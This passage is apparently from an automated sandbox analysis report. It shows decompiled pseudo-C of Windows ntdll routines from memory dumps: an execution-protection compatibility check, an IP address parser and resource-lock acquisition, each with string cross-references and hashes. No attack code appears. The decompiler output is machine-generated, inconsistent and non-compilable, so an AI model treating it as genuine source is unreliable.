                                                                                                                                                            				_t72 = _a4;
                                                                                                                                                            				if(E02207F4F(__ecx, _t72 + 0x2c,  &_v548) >= 0) {
                                                                                                                                                            					__eflags = _v548;
                                                                                                                                                            					if(_v548 == 0) {
                                                                                                                                                            						goto L1;
                                                                                                                                                            					}
                                                                                                                                                            					_t62 = _t72 + 0x24;
                                                                                                                                                            					E02223F92(0x55, 3, "CLIENT(ntdll): Found CheckAppHelp = %d for %wZ in ImageFileExecutionOptions\n", _v548);
                                                                                                                                                            					_t71 = 0x214;
                                                                                                                                                            					_v544 = 0x214;
                                                                                                                                                            					E021DDFC0( &_v540, 0, 0x214);
                                                                                                                                                            					_t75 = _t74 + 0x20;
                                                                                                                                                            					_t46 =  *0x22b4218( *((intOrPtr*)(_t72 + 0x28)),  *((intOrPtr*)(_t72 + 0x18)),  *((intOrPtr*)(_t72 + 0x20)), L"ExecuteOptions",  &_v556,  &_v540,  &_v544, _t62);
                                                                                                                                                            					__eflags = _t46;
                                                                                                                                                            					if(_t46 == 0) {
                                                                                                                                                            						goto L1;
                                                                                                                                                            					}
                                                                                                                                                            					_t47 = _v544;
                                                                                                                                                            					__eflags = _t47;
                                                                                                                                                            					if(_t47 == 0) {
                                                                                                                                                            						goto L1;
                                                                                                                                                            					}
                                                                                                                                                            					__eflags = _t47 - 0x214;
                                                                                                                                                            					if(_t47 >= 0x214) {
                                                                                                                                                            						goto L1;
                                                                                                                                                            					}
                                                                                                                                                            					_push(_t62);
                                                                                                                                                            					 *((short*)(_t73 + (_t47 >> 1) * 2 - 0x21a)) = 0;
                                                                                                                                                            					E02223F92(0x55, 3, "CLIENT(ntdll): Found ExecuteOptions = %ws for %wZ in application compatibility database\n",  &_v540);
                                                                                                                                                            					_t52 = E021E0D27( &_v540, L"Execute=1");
                                                                                                                                                            					_t76 = _t75 + 0x1c;
                                                                                                                                                            					_push(_t62);
                                                                                                                                                            					__eflags = _t52;
                                                                                                                                                            					if(_t52 == 0) {
                                                                                                                                                            						E02223F92(0x55, 3, "CLIENT(ntdll): Processing %ws for patching section protection for %wZ\n",  &_v540);
                                                                                                                                                            						_t71 =  &_v540;
                                                                                                                                                            						_t56 = _t73 + _v544 - 0x218;
                                                                                                                                                            						_t77 = _t76 + 0x14;
                                                                                                                                                            						_v552 = _t56;
                                                                                                                                                            						__eflags = _t71 - _t56;
                                                                                                                                                            						if(_t71 >= _t56) {
                                                                                                                                                            							goto L1;
                                                                                                                                                            						} else {
                                                                                                                                                            							goto L10;
                                                                                                                                                            						}
                                                                                                                                                            						while(1) {
                                                                                                                                                            							L10:
                                                                                                                                                            							_t62 = E021E8375(_t71, 0x20);
                                                                                                                                                            							_pop(_t69);
                                                                                                                                                            							__eflags = _t62;
                                                                                                                                                            							if(__eflags != 0) {
                                                                                                                                                            								__eflags = 0;
                                                                                                                                                            								 *_t62 = 0;
                                                                                                                                                            							}
                                                                                                                                                            							E02223F92(0x55, 3, "CLIENT(ntdll): Processing section info %ws...\n", _t71);
                                                                                                                                                            							_t77 = _t77 + 0x10;
                                                                                                                                                            							E0224E8DB(_t69, _t70, __eflags, _t72, _t71);
                                                                                                                                                            							__eflags = _t62;
                                                                                                                                                            							if(_t62 == 0) {
                                                                                                                                                            								goto L1;
                                                                                                                                                            							}
                                                                                                                                                            							_t31 = _t62 + 2; // 0x2
                                                                                                                                                            							_t71 = _t31;
                                                                                                                                                            							__eflags = _t71 - _v552;
                                                                                                                                                            							if(_t71 >= _v552) {
                                                                                                                                                            								goto L1;
                                                                                                                                                            							}
                                                                                                                                                            						}
                                                                                                                                                            					}
                                                                                                                                                            					_push("CLIENT(ntdll): Found Execute=1, turning off execution protection for the process because of %wZ\n");
                                                                                                                                                            					_push(3);
                                                                                                                                                            					_push(0x55);
                                                                                                                                                            					E02223F92();
                                                                                                                                                            					_t38 = 1;
                                                                                                                                                            					L2:
                                                                                                                                                            					return E021DE1B4(_t38, _t62, _v8 ^ _t73, _t70, _t71, _t72);
                                                                                                                                                            				}
                                                                                                                                                            				L1:
                                                                                                                                                            				_t38 = 0;
                                                                                                                                                            				goto L2;
                                                                                                                                                            			}


                                                                                                                                                            APIs
                                                                                                                                                            • BaseQueryModuleData.KERNEL32(?,00000000,00000000,ExecuteOptions,?,?,?), ref: 02223F12
                                                                                                                                                            Strings
                                                                                                                                                            • Execute=1, xrefs: 02223F5E
                                                                                                                                                            • ExecuteOptions, xrefs: 02223F04
                                                                                                                                                            • CLIENT(ntdll): Processing section info %ws..., xrefs: 0222E345
                                                                                                                                                            • CLIENT(ntdll): Found Execute=1, turning off execution protection for the process because of %wZ, xrefs: 02223F75
                                                                                                                                                            • CLIENT(ntdll): Found CheckAppHelp = %d for %wZ in ImageFileExecutionOptions, xrefs: 02223EC4
                                                                                                                                                            • CLIENT(ntdll): Found ExecuteOptions = %ws for %wZ in application compatibility database, xrefs: 02223F4A
                                                                                                                                                            • CLIENT(ntdll): Processing %ws for patching section protection for %wZ, xrefs: 0222E2FB
                                                                                                                                                            Memory Dump Source
                                                                                                                                                            • Source File: 00000008.00000002.2380389755.00000000021C0000.00000040.00000001.sdmp, Offset: 021B0000, based on PE: true
                                                                                                                                                            • Associated: 00000008.00000002.2380381681.00000000021B0000.00000040.00000001.sdmp
                                                                                                                                                            • Associated: 00000008.00000002.2380554938.00000000022A0000.00000040.00000001.sdmp
                                                                                                                                                            • Associated: 00000008.00000002.2380560407.00000000022B0000.00000040.00000001.sdmp
                                                                                                                                                            • Associated: 00000008.00000002.2380566043.00000000022B4000.00000040.00000001.sdmp
                                                                                                                                                            • Associated: 00000008.00000002.2380572289.00000000022B7000.00000040.00000001.sdmp
                                                                                                                                                            • Associated: 00000008.00000002.2380578244.00000000022C0000.00000040.00000001.sdmp
                                                                                                                                                            • Associated: 00000008.00000002.2380623418.0000000002320000.00000040.00000001.sdmp
                                                                                                                                                            Similarity
                                                                                                                                                            • API ID: BaseDataModuleQuery
                                                                                                                                                            • String ID: CLIENT(ntdll): Found CheckAppHelp = %d for %wZ in ImageFileExecutionOptions$CLIENT(ntdll): Found Execute=1, turning off execution protection for the process because of %wZ$CLIENT(ntdll): Found ExecuteOptions = %ws for %wZ in application compatibility database$CLIENT(ntdll): Processing %ws for patching section protection for %wZ$CLIENT(ntdll): Processing section info %ws...$Execute=1$ExecuteOptions
                                                                                                                                                            • API String ID: 3901378454-484625025
                                                                                                                                                            • Opcode ID: 378a98ba053a42b73128b5e67b7eaa5b9e2b6384441043e537bca293b8bff135
                                                                                                                                                            • Instruction ID: 18974d8d942e382a3572aca2d2bbab1861450e7adf6006d1edae24e90f59a735
                                                                                                                                                            • Opcode Fuzzy Hash: 378a98ba053a42b73128b5e67b7eaa5b9e2b6384441043e537bca293b8bff135
                                                                                                                                                            • Instruction Fuzzy Hash: 5741E9716D031DBAEF20EAD4DCC9FEAB3BDAF14704F0005A9E505E6081EB75AA458F61
                                                                                                                                                            Uniqueness

                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                            C-Code - Quality: 100%
                                                                                                                                                            			E02210B15(intOrPtr* _a4, char _a7, intOrPtr* _a8, intOrPtr _a12) {
                                                                                                                                                            				signed int _v8;
                                                                                                                                                            				signed int _v12;
                                                                                                                                                            				signed int _v16;
                                                                                                                                                            				signed int _v20;
                                                                                                                                                            				signed int _v24;
                                                                                                                                                            				signed int _v28;
                                                                                                                                                            				signed int _v32;
                                                                                                                                                            				void* _t108;
                                                                                                                                                            				void* _t116;
                                                                                                                                                            				char _t120;
                                                                                                                                                            				short _t121;
                                                                                                                                                            				void* _t128;
                                                                                                                                                            				intOrPtr* _t130;
                                                                                                                                                            				char _t132;
                                                                                                                                                            				short _t133;
                                                                                                                                                            				intOrPtr _t141;
                                                                                                                                                            				signed int _t156;
                                                                                                                                                            				signed int _t174;
                                                                                                                                                            				intOrPtr _t177;
                                                                                                                                                            				intOrPtr* _t179;
                                                                                                                                                            				intOrPtr _t180;
                                                                                                                                                            				void* _t183;
                                                                                                                                                            
                                                                                                                                                            				_t179 = _a4;
                                                                                                                                                            				_t141 =  *_t179;
                                                                                                                                                            				_v16 = 0;
                                                                                                                                                            				_v28 = 0;
                                                                                                                                                            				_v8 = 0;
                                                                                                                                                            				_v24 = 0;
                                                                                                                                                            				_v12 = 0;
                                                                                                                                                            				_v32 = 0;
                                                                                                                                                            				_v20 = 0;
                                                                                                                                                            				if(_t141 == 0) {
                                                                                                                                                            					L41:
                                                                                                                                                            					 *_a8 = _t179;
                                                                                                                                                            					_t180 = _v24;
                                                                                                                                                            					if(_t180 != 0) {
                                                                                                                                                            						if(_t180 != 3) {
                                                                                                                                                            							goto L6;
                                                                                                                                                            						}
                                                                                                                                                            						_v8 = _v8 + 1;
                                                                                                                                                            					}
                                                                                                                                                            					_t174 = _v32;
                                                                                                                                                            					if(_t174 == 0) {
                                                                                                                                                            						if(_v8 == 7) {
                                                                                                                                                            							goto L43;
                                                                                                                                                            						}
                                                                                                                                                            						goto L6;
                                                                                                                                                            					}
                                                                                                                                                            					L43:
                                                                                                                                                            					if(_v16 != 1) {
                                                                                                                                                            						if(_v16 != 2) {
                                                                                                                                                            							goto L6;
                                                                                                                                                            						}
                                                                                                                                                            						 *((short*)(_a12 + _v20 * 2)) = 0;
                                                                                                                                                            						L47:
                                                                                                                                                            						if(_t174 != 0) {
                                                                                                                                                            							E021E8980(_a12 + 0x10 + (_t174 - _v8) * 2, _a12 + _t174 * 2, _v8 - _t174 + _v8 - _t174);
                                                                                                                                                            							_t116 = 8;
                                                                                                                                                            							E021DDFC0(_a12 + _t174 * 2, 0, _t116 - _v8 + _t116 - _v8);
                                                                                                                                                            						}
                                                                                                                                                            						return 0;
                                                                                                                                                            					}
                                                                                                                                                            					if(_t180 != 0) {
                                                                                                                                                            						if(_v12 > 3) {
                                                                                                                                                            							goto L6;
                                                                                                                                                            						}
                                                                                                                                                            						_t120 = E02210CFA(_v28, 0, 0xa);
                                                                                                                                                            						_t183 = _t183 + 0xc;
                                                                                                                                                            						if(_t120 > 0xff) {
                                                                                                                                                            							goto L6;
                                                                                                                                                            						}
                                                                                                                                                            						 *((char*)(_t180 + _v20 * 2 + _a12)) = _t120;
                                                                                                                                                            						goto L47;
                                                                                                                                                            					}
                                                                                                                                                            					if(_v12 > 4) {
                                                                                                                                                            						goto L6;
                                                                                                                                                            					}
                                                                                                                                                            					_t121 = E02210CFA(_v28, _t180, 0x10);
                                                                                                                                                            					_t183 = _t183 + 0xc;
                                                                                                                                                            					 *((short*)(_a12 + _v20 * 2)) = _t121;
                                                                                                                                                            					goto L47;
                                                                                                                                                            				} else {
                                                                                                                                                            					while(1) {
                                                                                                                                                            						_t123 = _v16;
                                                                                                                                                            						if(_t123 == 0) {
                                                                                                                                                            							goto L7;
                                                                                                                                                            						}
                                                                                                                                                            						_t108 = _t123 - 1;
                                                                                                                                                            						if(_t108 != 0) {
                                                                                                                                                            							goto L1;
                                                                                                                                                            						}
                                                                                                                                                            						_t178 = _t141;
                                                                                                                                                            						if(E022106BA(_t108, _t141) == 0 || _t135 == 0) {
                                                                                                                                                            							if(E022106BA(_t135, _t178) == 0 || E02210A5B(_t136, _t178) == 0) {
                                                                                                                                                            								if(_t141 != 0x3a) {
                                                                                                                                                            									if(_t141 == 0x2e) {
                                                                                                                                                            										if(_a7 != 0 || _v24 > 2 || _v8 > 6) {
                                                                                                                                                            											goto L41;
                                                                                                                                                            										} else {
                                                                                                                                                            											_v24 = _v24 + 1;
                                                                                                                                                            											L27:
                                                                                                                                                            											_v16 = _v16 & 0x00000000;
                                                                                                                                                            											L28:
                                                                                                                                                            											if(_v28 == 0) {
                                                                                                                                                            												goto L20;
                                                                                                                                                            											}
                                                                                                                                                            											_t177 = _v24;
                                                                                                                                                            											if(_t177 != 0) {
                                                                                                                                                            												if(_v12 > 3) {
                                                                                                                                                            													L6:
                                                                                                                                                            													return 0xc000000d;
                                                                                                                                                            												}
                                                                                                                                                            												_t132 = E02210CFA(_v28, 0, 0xa);
                                                                                                                                                            												_t183 = _t183 + 0xc;
                                                                                                                                                            												if(_t132 > 0xff) {
                                                                                                                                                            													goto L6;
                                                                                                                                                            												}
                                                                                                                                                            												 *((char*)(_t177 + _v20 * 2 + _a12 - 1)) = _t132;
                                                                                                                                                            												goto L20;
                                                                                                                                                            											}
                                                                                                                                                            											if(_v12 > 4) {
                                                                                                                                                            												goto L6;
                                                                                                                                                            											}
                                                                                                                                                            											_t133 = E02210CFA(_v28, 0, 0x10);
                                                                                                                                                            											_t183 = _t183 + 0xc;
                                                                                                                                                            											_v20 = _v20 + 1;
                                                                                                                                                            											 *((short*)(_a12 + _v20 * 2)) = _t133;
                                                                                                                                                            											goto L20;
                                                                                                                                                            										}
                                                                                                                                                            									}
                                                                                                                                                            									goto L41;
                                                                                                                                                            								}
                                                                                                                                                            								if(_v24 > 0 || _v8 > 6) {
                                                                                                                                                            									goto L41;
                                                                                                                                                            								} else {
                                                                                                                                                            									_t130 = _t179 + 1;
                                                                                                                                                            									if( *_t130 == _t141) {
                                                                                                                                                            										if(_v32 != 0) {
                                                                                                                                                            											goto L41;
                                                                                                                                                            										}
                                                                                                                                                            										_v32 = _v8 + 1;
                                                                                                                                                            										_t156 = 2;
                                                                                                                                                            										_v8 = _v8 + _t156;
                                                                                                                                                            										L34:
                                                                                                                                                            										_t179 = _t130;
                                                                                                                                                            										_v16 = _t156;
                                                                                                                                                            										goto L28;
                                                                                                                                                            									}
                                                                                                                                                            									_v8 = _v8 + 1;
                                                                                                                                                            									goto L27;
                                                                                                                                                            								}
                                                                                                                                                            							} else {
                                                                                                                                                            								_v12 = _v12 + 1;
                                                                                                                                                            								if(_v24 > 0) {
                                                                                                                                                            									goto L41;
                                                                                                                                                            								}
                                                                                                                                                            								_a7 = 1;
                                                                                                                                                            								goto L20;
                                                                                                                                                            							}
                                                                                                                                                            						} else {
                                                                                                                                                            							_v12 = _v12 + 1;
                                                                                                                                                            							L20:
                                                                                                                                                            							_t179 = _t179 + 1;
                                                                                                                                                            							_t141 =  *_t179;
                                                                                                                                                            							if(_t141 == 0) {
                                                                                                                                                            								goto L41;
                                                                                                                                                            							}
                                                                                                                                                            							continue;
                                                                                                                                                            						}
                                                                                                                                                            						L7:
                                                                                                                                                            						if(_t141 == 0x3a) {
                                                                                                                                                            							if(_v24 > 0 || _v8 > 0) {
                                                                                                                                                            								goto L41;
                                                                                                                                                            							} else {
                                                                                                                                                            								_t130 = _t179 + 1;
                                                                                                                                                            								if( *_t130 != _t141) {
                                                                                                                                                            									goto L41;
                                                                                                                                                            								}
                                                                                                                                                            								_v20 = _v20 + 1;
                                                                                                                                                            								_t156 = 2;
                                                                                                                                                            								_v32 = 1;
                                                                                                                                                            								_v8 = _t156;
                                                                                                                                                            								 *((short*)(_a12 + _v20 * 2)) = 0;
                                                                                                                                                            								goto L34;
                                                                                                                                                            							}
                                                                                                                                                            						}
                                                                                                                                                            						L8:
                                                                                                                                                            						if(_v8 > 7) {
                                                                                                                                                            							goto L41;
                                                                                                                                                            						}
                                                                                                                                                            						_t142 = _t141;
                                                                                                                                                            						if(E022106BA(_t123, _t141) == 0 || _t124 == 0) {
                                                                                                                                                            							if(E022106BA(_t124, _t142) == 0 || E02210A5B(_t125, _t142) == 0 || _v24 > 0) {
                                                                                                                                                            								goto L41;
                                                                                                                                                            							} else {
                                                                                                                                                            								_t128 = 1;
                                                                                                                                                            								_a7 = 1;
                                                                                                                                                            								_v28 = _t179;
                                                                                                                                                            								_v16 = 1;
                                                                                                                                                            								_v12 = 1;
                                                                                                                                                            								L39:
                                                                                                                                                            								if(_v16 == _t128) {
                                                                                                                                                            									goto L20;
                                                                                                                                                            								}
                                                                                                                                                            								goto L28;
                                                                                                                                                            							}
                                                                                                                                                            						} else {
                                                                                                                                                            							_a7 = 0;
                                                                                                                                                            							_v28 = _t179;
                                                                                                                                                            							_v16 = 1;
                                                                                                                                                            							_v12 = 1;
                                                                                                                                                            							goto L20;
                                                                                                                                                            						}
                                                                                                                                                            					}
                                                                                                                                                            				}
                                                                                                                                                            				L1:
                                                                                                                                                            				_t123 = _t108 == 1;
                                                                                                                                                            				if(_t108 == 1) {
                                                                                                                                                            					goto L8;
                                                                                                                                                            				}
                                                                                                                                                            				_t128 = 1;
                                                                                                                                                            				goto L39;
                                                                                                                                                            			}

























                                                                                                                                                            0x02210c24
                                                                                                                                                            0x02210c24
                                                                                                                                                            0x02210c26
                                                                                                                                                            0x00000000
                                                                                                                                                            0x02210c26
                                                                                                                                                            0x02210bcd
                                                                                                                                                            0x00000000
                                                                                                                                                            0x02210bcd
                                                                                                                                                            0x02210b89
                                                                                                                                                            0x02210b89
                                                                                                                                                            0x02210b90
                                                                                                                                                            0x00000000
                                                                                                                                                            0x00000000
                                                                                                                                                            0x02210b96
                                                                                                                                                            0x00000000
                                                                                                                                                            0x02210b96
                                                                                                                                                            0x02210a04
                                                                                                                                                            0x02210a04
                                                                                                                                                            0x02210b9a
                                                                                                                                                            0x02210b9a
                                                                                                                                                            0x02210b9b
                                                                                                                                                            0x02210b9f
                                                                                                                                                            0x00000000
                                                                                                                                                            0x00000000
                                                                                                                                                            0x00000000
                                                                                                                                                            0x02210ba5
                                                                                                                                                            0x02210ac7
                                                                                                                                                            0x02210aca
                                                                                                                                                            0x0223eacf
                                                                                                                                                            0x00000000
                                                                                                                                                            0x0223eade
                                                                                                                                                            0x0223eade
                                                                                                                                                            0x0223eae3
                                                                                                                                                            0x00000000
                                                                                                                                                            0x00000000
                                                                                                                                                            0x0223eaf3
                                                                                                                                                            0x0223eaf6
                                                                                                                                                            0x0223eaf7
                                                                                                                                                            0x0223eafe
                                                                                                                                                            0x0223eb01
                                                                                                                                                            0x00000000
                                                                                                                                                            0x0223eb01
                                                                                                                                                            0x0223eacf
                                                                                                                                                            0x02210ad0
                                                                                                                                                            0x02210ad4
                                                                                                                                                            0x00000000
                                                                                                                                                            0x00000000
                                                                                                                                                            0x02210ada
                                                                                                                                                            0x02210ae6
                                                                                                                                                            0x02210c34
                                                                                                                                                            0x00000000
                                                                                                                                                            0x02210c47
                                                                                                                                                            0x02210c49
                                                                                                                                                            0x02210c4a
                                                                                                                                                            0x02210c4e
                                                                                                                                                            0x02210c51
                                                                                                                                                            0x02210c54
                                                                                                                                                            0x02210c57
                                                                                                                                                            0x02210c5a
                                                                                                                                                            0x00000000
                                                                                                                                                            0x00000000
                                                                                                                                                            0x00000000
                                                                                                                                                            0x02210c60
                                                                                                                                                            0x02210afb
                                                                                                                                                            0x02210afe
                                                                                                                                                            0x02210b02
                                                                                                                                                            0x02210b05
                                                                                                                                                            0x02210b08
                                                                                                                                                            0x00000000
                                                                                                                                                            0x02210b08
                                                                                                                                                            0x02210ae6
                                                                                                                                                            0x02210b44
                                                                                                                                                            0x022109f8
                                                                                                                                                            0x022109f8
                                                                                                                                                            0x022109f9
                                                                                                                                                            0x00000000
                                                                                                                                                            0x00000000
                                                                                                                                                            0x0223eaa0
                                                                                                                                                            0x00000000

                                                                                                                                                            APIs
                                                                                                                                                            Strings
                                                                                                                                                            Memory Dump Source
                                                                                                                                                            • Source File: 00000008.00000002.2380389755.00000000021C0000.00000040.00000001.sdmp, Offset: 021B0000, based on PE: true
                                                                                                                                                            • Associated: 00000008.00000002.2380381681.00000000021B0000.00000040.00000001.sdmp
                                                                                                                                                            • Associated: 00000008.00000002.2380554938.00000000022A0000.00000040.00000001.sdmp
                                                                                                                                                            • Associated: 00000008.00000002.2380560407.00000000022B0000.00000040.00000001.sdmp
                                                                                                                                                            • Associated: 00000008.00000002.2380566043.00000000022B4000.00000040.00000001.sdmp
                                                                                                                                                            • Associated: 00000008.00000002.2380572289.00000000022B7000.00000040.00000001.sdmp
                                                                                                                                                            • Associated: 00000008.00000002.2380578244.00000000022C0000.00000040.00000001.sdmp
                                                                                                                                                            • Associated: 00000008.00000002.2380623418.0000000002320000.00000040.00000001.sdmp
                                                                                                                                                            Similarity
                                                                                                                                                            • API ID: __fassign
                                                                                                                                                            • String ID: .$:$:
                                                                                                                                                            • API String ID: 3965848254-2308638275
                                                                                                                                                            • Opcode ID: b15de34944a390e3fa5e98378680e2de18144008d38fd4e6897fe19ea25b26ab
                                                                                                                                                            • Instruction ID: e4d3de58c6dae4fb1c1adc1b567b61cf055a3e8b2dade1e0b98778348e9e7f05
                                                                                                                                                            • Opcode Fuzzy Hash: b15de34944a390e3fa5e98378680e2de18144008d38fd4e6897fe19ea25b26ab
                                                                                                                                                            • Instruction Fuzzy Hash: 47A17E71D2020ADECF24CFD4C854AAEB7F5AF25309F24846ADC42A7289D7745B85CF91
                                                                                                                                                            Uniqueness

                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                            C-Code - Quality: 49%
                                                                                                                                                            			E02210554(signed int _a4, char _a8) {
                                                                                                                                                            				void* __ebx;
                                                                                                                                                            				void* __edi;
                                                                                                                                                            				void* __esi;
                                                                                                                                                            				signed int* _t49;
                                                                                                                                                            				signed int _t51;
                                                                                                                                                            				signed int _t56;
                                                                                                                                                            				signed int _t58;
                                                                                                                                                            				signed int _t61;
                                                                                                                                                            				signed int _t63;
                                                                                                                                                            				void* _t66;
                                                                                                                                                            				intOrPtr _t67;
                                                                                                                                                            				signed int _t70;
                                                                                                                                                            				void* _t75;
                                                                                                                                                            				signed int _t81;
                                                                                                                                                            				signed int _t84;
                                                                                                                                                            				void* _t86;
                                                                                                                                                            				signed int _t93;
                                                                                                                                                            				signed int _t96;
                                                                                                                                                            				intOrPtr _t105;
                                                                                                                                                            				signed int _t107;
                                                                                                                                                            				void* _t110;
                                                                                                                                                            				signed int _t115;
                                                                                                                                                            				signed int* _t119;
                                                                                                                                                            				void* _t125;
                                                                                                                                                            				void* _t126;
                                                                                                                                                            				signed int _t128;
                                                                                                                                                            				signed int _t130;
                                                                                                                                                            				signed int _t138;
                                                                                                                                                            				signed int _t144;
                                                                                                                                                            				void* _t158;
                                                                                                                                                            				void* _t159;
                                                                                                                                                            				void* _t160;
                                                                                                                                                            
                                                                                                                                                            				_t96 = _a4;
                                                                                                                                                            				_t115 =  *(_t96 + 0x28);
                                                                                                                                                            				_push(_t138);
                                                                                                                                                            				if(_t115 < 0) {
                                                                                                                                                            					_t105 =  *[fs:0x18];
                                                                                                                                                            					__eflags =  *((intOrPtr*)(_t96 + 0x2c)) -  *((intOrPtr*)(_t105 + 0x24));
                                                                                                                                                            					if( *((intOrPtr*)(_t96 + 0x2c)) !=  *((intOrPtr*)(_t105 + 0x24))) {
                                                                                                                                                            						goto L6;
                                                                                                                                                            					} else {
                                                                                                                                                            						__eflags = _t115 | 0xffffffff;
                                                                                                                                                            						asm("lock xadd [eax], edx");
                                                                                                                                                            						return 1;
                                                                                                                                                            					}
                                                                                                                                                            				} else {
                                                                                                                                                            					L6:
                                                                                                                                                            					_push(_t128);
                                                                                                                                                            					while(1) {
                                                                                                                                                            						L7:
                                                                                                                                                            						__eflags = _t115;
                                                                                                                                                            						if(_t115 >= 0) {
                                                                                                                                                            							break;
                                                                                                                                                            						}
                                                                                                                                                            						__eflags = _a8;
                                                                                                                                                            						if(_a8 == 0) {
                                                                                                                                                            							__eflags = 0;
                                                                                                                                                            							return 0;
                                                                                                                                                            						} else {
                                                                                                                                                            							 *((intOrPtr*)( *((intOrPtr*)(_t96 + 0x34)) + 0x14)) =  *((intOrPtr*)( *((intOrPtr*)(_t96 + 0x34)) + 0x14)) + 1;
                                                                                                                                                            							_t49 = _t96 + 0x1c;
                                                                                                                                                            							_t106 = 1;
                                                                                                                                                            							asm("lock xadd [edx], ecx");
                                                                                                                                                            							_t115 =  *(_t96 + 0x28);
                                                                                                                                                            							__eflags = _t115;
                                                                                                                                                            							if(_t115 < 0) {
                                                                                                                                                            								L23:
                                                                                                                                                            								_t130 = 0;
                                                                                                                                                            								__eflags = 0;
                                                                                                                                                            								while(1) {
                                                                                                                                                            									_t118 =  *(_t96 + 0x30) & 0x00000001;
                                                                                                                                                            									asm("sbb esi, esi");
                                                                                                                                                            									_t144 =  !( ~( *(_t96 + 0x30) & 1)) & 0x022b01c0;
                                                                                                                                                            									_push(_t144);
                                                                                                                                                            									_push(0);
                                                                                                                                                            									_t51 = E021CF8CC( *((intOrPtr*)(_t96 + 0x18)));
                                                                                                                                                            									__eflags = _t51 - 0x102;
                                                                                                                                                            									if(_t51 != 0x102) {
                                                                                                                                                            										break;
                                                                                                                                                            									}
                                                                                                                                                            									_t106 =  *(_t144 + 4);
                                                                                                                                                            									_t126 =  *_t144;
                                                                                                                                                            									_t86 = E02214FC0(_t126,  *(_t144 + 4), 0xff676980, 0xffffffff);
                                                                                                                                                            									_push(_t126);
                                                                                                                                                            									_push(_t86);
                                                                                                                                                            									E02223F92(0x65, 0, "RTL: Acquire Shared Sem Timeout %d(%I64u secs)\n", _t130);
                                                                                                                                                            									E02223F92(0x65, 0, "RTL: Resource at %p\n", _t96);
                                                                                                                                                            									_t130 = _t130 + 1;
                                                                                                                                                            									_t160 = _t158 + 0x28;
                                                                                                                                                            									__eflags = _t130 - 2;
                                                                                                                                                            									if(__eflags > 0) {
                                                                                                                                                            										E0225217A(_t106, __eflags, _t96);
                                                                                                                                                            									}
                                                                                                                                                            									_push("RTL: Re-Waiting\n");
                                                                                                                                                            									_push(0);
                                                                                                                                                            									_push(0x65);
                                                                                                                                                            									E02223F92();
                                                                                                                                                            									_t158 = _t160 + 0xc;
                                                                                                                                                            								}
                                                                                                                                                            								__eflags = _t51;
                                                                                                                                                            								if(__eflags < 0) {
                                                                                                                                                            									_push(_t51);
                                                                                                                                                            									E02213915(_t96, _t106, _t118, _t130, _t144, __eflags);
                                                                                                                                                            									asm("int3");
                                                                                                                                                            									while(1) {
                                                                                                                                                            										L32:
                                                                                                                                                            										__eflags = _a8;
                                                                                                                                                            										if(_a8 == 0) {
                                                                                                                                                            											break;
                                                                                                                                                            										}
                                                                                                                                                            										 *((intOrPtr*)( *((intOrPtr*)(_t96 + 0x34)) + 0x14)) =  *((intOrPtr*)( *((intOrPtr*)(_t96 + 0x34)) + 0x14)) + 1;
                                                                                                                                                            										_t119 = _t96 + 0x24;
                                                                                                                                                            										_t107 = 1;
                                                                                                                                                            										asm("lock xadd [eax], ecx");
                                                                                                                                                            										_t56 =  *(_t96 + 0x28);
                                                                                                                                                            										_a4 = _t56;
                                                                                                                                                            										__eflags = _t56;
                                                                                                                                                            										if(_t56 != 0) {
                                                                                                                                                            											L40:
                                                                                                                                                            											_t128 = 0;
                                                                                                                                                            											__eflags = 0;
                                                                                                                                                            											while(1) {
                                                                                                                                                            												_t121 =  *(_t96 + 0x30) & 0x00000001;
                                                                                                                                                            												asm("sbb esi, esi");
                                                                                                                                                            												_t138 =  !( ~( *(_t96 + 0x30) & 1)) & 0x022b01c0;
                                                                                                                                                            												_push(_t138);
                                                                                                                                                            												_push(0);
                                                                                                                                                            												_t58 = E021CF8CC( *((intOrPtr*)(_t96 + 0x20)));
                                                                                                                                                            												__eflags = _t58 - 0x102;
                                                                                                                                                            												if(_t58 != 0x102) {
                                                                                                                                                            													break;
                                                                                                                                                            												}
                                                                                                                                                            												_t107 =  *(_t138 + 4);
                                                                                                                                                            												_t125 =  *_t138;
                                                                                                                                                            												_t75 = E02214FC0(_t125, _t107, 0xff676980, 0xffffffff);
                                                                                                                                                            												_push(_t125);
                                                                                                                                                            												_push(_t75);
                                                                                                                                                            												E02223F92(0x65, 0, "RTL: Acquire Exclusive Sem Timeout %d (%I64u secs)\n", _t128);
                                                                                                                                                            												E02223F92(0x65, 0, "RTL: Resource at %p\n", _t96);
                                                                                                                                                            												_t128 = _t128 + 1;
                                                                                                                                                            												_t159 = _t158 + 0x28;
                                                                                                                                                            												__eflags = _t128 - 2;
                                                                                                                                                            												if(__eflags > 0) {
                                                                                                                                                            													E0225217A(_t107, __eflags, _t96);
                                                                                                                                                            												}
                                                                                                                                                            												_push("RTL: Re-Waiting\n");
                                                                                                                                                            												_push(0);
                                                                                                                                                            												_push(0x65);
                                                                                                                                                            												E02223F92();
                                                                                                                                                            												_t158 = _t159 + 0xc;
                                                                                                                                                            											}
                                                                                                                                                            											__eflags = _t58;
                                                                                                                                                            											if(__eflags < 0) {
                                                                                                                                                            												_push(_t58);
                                                                                                                                                            												E02213915(_t96, _t107, _t121, _t128, _t138, __eflags);
                                                                                                                                                            												asm("int3");
                                                                                                                                                            												_t61 =  *_t107;
                                                                                                                                                            												 *_t107 = 0;
                                                                                                                                                            												__eflags = _t61;
                                                                                                                                                            												if(_t61 == 0) {
                                                                                                                                                            													L1:
                                                                                                                                                            													_t63 = E021F5384(_t138 + 0x24);
                                                                                                                                                            													if(_t63 != 0) {
                                                                                                                                                            														goto L52;
                                                                                                                                                            													} else {
                                                                                                                                                            														goto L2;
                                                                                                                                                            													}
                                                                                                                                                            												} else {
                                                                                                                                                            													_t123 =  *((intOrPtr*)(_t138 + 0x18));
                                                                                                                                                            													_push( &_a4);
                                                                                                                                                            													_push(_t61);
                                                                                                                                                            													_t70 = E021CF970( *((intOrPtr*)(_t138 + 0x18)));
                                                                                                                                                            													__eflags = _t70;
                                                                                                                                                            													if(__eflags >= 0) {
                                                                                                                                                            														goto L1;
                                                                                                                                                            													} else {
                                                                                                                                                            														_push(_t70);
                                                                                                                                                            														E02213915(_t96,  &_a4, _t123, _t128, _t138, __eflags);
                                                                                                                                                            														L52:
                                                                                                                                                            														_t122 =  *((intOrPtr*)(_t138 + 0x20));
                                                                                                                                                            														_push( &_a4);
                                                                                                                                                            														_push(1);
                                                                                                                                                            														_t63 = E021CF970( *((intOrPtr*)(_t138 + 0x20)));
                                                                                                                                                            														__eflags = _t63;
                                                                                                                                                            														if(__eflags >= 0) {
